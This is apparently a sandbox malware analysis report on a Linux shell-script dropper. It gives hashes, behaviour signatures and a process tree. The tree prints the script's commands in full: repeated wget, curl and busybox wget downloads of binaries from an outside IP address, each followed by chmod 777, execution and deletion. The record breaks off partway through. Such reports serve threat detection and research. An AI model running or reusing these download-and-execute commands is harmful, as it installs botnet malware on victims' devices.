Analysis
-
max time kernel
67s -
max time network
72s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
-
Size
10KB
-
MD5
b8957a4d872db8549e6dd376ab9dafcc
-
SHA1
92bd1f467ac4ee061f16287c03b87e0b08bd1ec7
-
SHA256
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b
-
SHA512
dc72ec24cf00f2137c1523a199d86c0c507173013220d9b44f0304ff2ef9c1086fdce94d435aeaca9f68818b7af05083109fc3c2eaf99a341fa00838d393a406
-
SSDEEP
192:YiiT1B9dLJyOdggODXRA13TP9dLJyOLggODXm3TQX:YiiT1B9dLJyOgA1P9dLJyOhQX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 741 chmod 763 chmod 775 chmod 824 chmod 834 chmod 840 chmod 846 chmod 698 chmod 873 chmod 885 chmod 708 chmod 724 chmod 783 chmod 808 chmod 852 chmod 866 chmod 879 chmod 893 chmod 688 chmod 911 chmod 905 chmod 899 chmod 919 chmod 858 chmod -
Executes dropped EXE 24 IoCs
ioc pid Process /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 689 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M 699 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm 709 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an 725 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ 742 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh 765 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC 776 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 785 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 809 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB 826 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a 835 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ 841 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo 847 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R 853 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ 861 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh 867 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC 874 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 880 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 886 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB 894 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a 900 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ 906 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo 912 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R 920 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R -
Checks CPU configuration 1 TTPs 24 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 886 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 887 rm 798 curl 805 busybox 882 wget 883 curl 788 wget 809 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 810 rm 884 busybox -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an curl File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ curl File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC curl File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R curl File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a curl File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh curl File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo curl File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R curl File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q curl File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q curl File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB curl File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a curl File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh curl File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 curl File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M curl File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ curl File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC curl File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 curl File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB curl File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo curl File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm curl File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 curl File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ curl File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ curl
Processes
-
/tmp/f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh/tmp/f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh1⤵PID:660
-
/bin/rm/bin/rm bins.sh2⤵PID:663
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:664
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:675
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:685
-
-
/bin/chmodchmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:691
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:693
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:696
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:697
-
-
/bin/chmodchmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Executes dropped EXE
PID:699
-
-
/bin/rmrm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:700
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:701
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:702
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:705
-
-
/bin/chmodchmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- File and Directory Permissions Modification
PID:708
-
-
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Executes dropped EXE
PID:709
-
-
/bin/rmrm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:710
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:711
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:720
-
-
/bin/chmodchmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:726
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:727
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:737
-
-
/bin/chmodchmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:745
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:759
-
-
/bin/chmodchmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:766
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:767
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:774
-
-
/bin/chmodchmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:777
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:778
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:780
-
-
/bin/chmodchmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:786
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:788
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:805
-
-
/bin/chmodchmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:809
-
-
/bin/rmrm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:810
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:812
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:821
-
-
/bin/chmodchmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:828
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:833
-
-
/bin/chmodchmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:836
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:837
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:839
-
-
/bin/chmodchmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:842
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:843
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:845
-
-
/bin/chmodchmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:851
-
-
/bin/chmodchmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:857
-
-
/bin/chmodchmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:865
-
-
/bin/chmodchmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:872
-
-
/bin/chmodchmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:878
-
-
/bin/chmodchmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:886
-
-
/bin/rmrm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Checks CPU configuration
